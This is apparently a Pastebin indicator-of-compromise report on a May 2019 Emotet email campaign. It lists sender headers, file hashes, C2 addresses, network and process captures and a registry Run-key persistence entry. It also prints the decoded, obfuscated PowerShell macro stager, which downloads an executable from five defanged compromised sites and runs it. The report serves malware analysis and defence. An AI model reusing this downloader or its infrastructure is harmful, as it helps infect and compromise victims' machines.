Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
- https://pastebin.com/F520pqQW
- previous_contact:
- 28/01/19 https://pastebin.com/z2TDfM7s
- 23/01/18 https://pastebin.com/D9TDts5J
- 20/12/18 https://pastebin.com/EejcbL4t
- 04/12/18 https://pastebin.com/znQDtbnt
- 09/11/18 https://pastebin.com/THHMs2wg
- 01/10/18 https://pastebin.com/Y6DnbpHv
- FAQ:
- attack_vector
- --------------
- email attach .doc > macro > WMI > powershell -enc > GET 5 URL > \Users\%name%\206.exe > C:\Users\%name%\AppData\Local\?\?.exe
- email_headers
- --------------
- Received: from diossa.com.mx (u21557617.onlinehome-server.com [198.251.79.161])
- Received: from [24.51.132.88] (unknown [24.51.132.88]) by diossa.com.mx (Postfix)
- Date: Wed, 15 May 2019 17:00:50 -0500
- From: Севернюк Татьяна <ventas_tpc@diossa.com.mx>
- To: <user00@victim01>
- Subject: RE: RE: Ціновий запит_комплектація для санвузла
- files
- --------------
- SHA-256 e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee
- File name DATA-916228-2122097647.doc [Composite Document File V2 Document, Application: Microsoft Office Word]
- File size 145.13 KB (148608 bytes)
- SHA-256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
- File name l4gktj_307970247.exe [PE32 executable (GUI) Intel 80386, for MS Windows] .!..L.!This program cannot be run in DOS mode.
- File size 75 KB (76800 bytes)
- activity
- **************
- macro_ps_b64_decoded:
- --------------
- $d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'
- PL_SCR 5 / 5
- --------------
- http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/
- http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/
- https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/
- http://adsprout[.] co/wp/oMrTbPUxE/
- http://springhelp[.] co[.] za/wp/jMSZNshHRf/
- C2
- --------------
- 78.188.7.213:8090
- 138.68.13.161:8080
- netwrk
- --------------
- 37.9.175.14 tomasoleksak{.} com GET /wp-includes/zm2ga7ha2l_5q8wl-2798/ HTTP/1.1 no User Agent (!)
- 78.188.7.213 78.188.7.213:8090 POST /health/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
- 138.68.13.161 138.68.13.161:8080 POST /loadan/enable/stubs/merge/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
- comp
- --------------
- powershell.exe 2632 TCP localhost 49539 37.9.175.14 80 ESTABLISHED
- eventssmall.exe 2108 TCP localhost 49540 90.57.69.215 80 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49542 191.92.69.115 80 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49544 75.177.169.225 80 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49546 78.188.7.213 8090 ESTABLISHED
- eventssmall.exe 2108 TCP localhost 49547 207.44.45.27 22 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49548 138.68.13.161 8080 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- ... [another context]
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN...==
- C:\Users\operator\206.exe
- C:\Users\operator\206.exe --d4ba2bdd
- C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
- C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 16.05.2019 11:08
- eventssmall
- c:\users\operator\appdata\local\eventssmall\eventssmall.exe 03.09.2012 12:06
- drop
- --------------
- %temp%\VBE\
- %temp%\Word8.0\MSForms.exd
- C:\Users\operator\206.exe [removed]
- C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
- # # #
- https://www.virustotal.com/gui/file/4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2/details
- https://www.virustotal.com/gui/file/e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee/details
- https://analyze.intezer.com/#/analyses/8f8911d3-7fb2-4e0d-9073-6c178d68c3ef
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement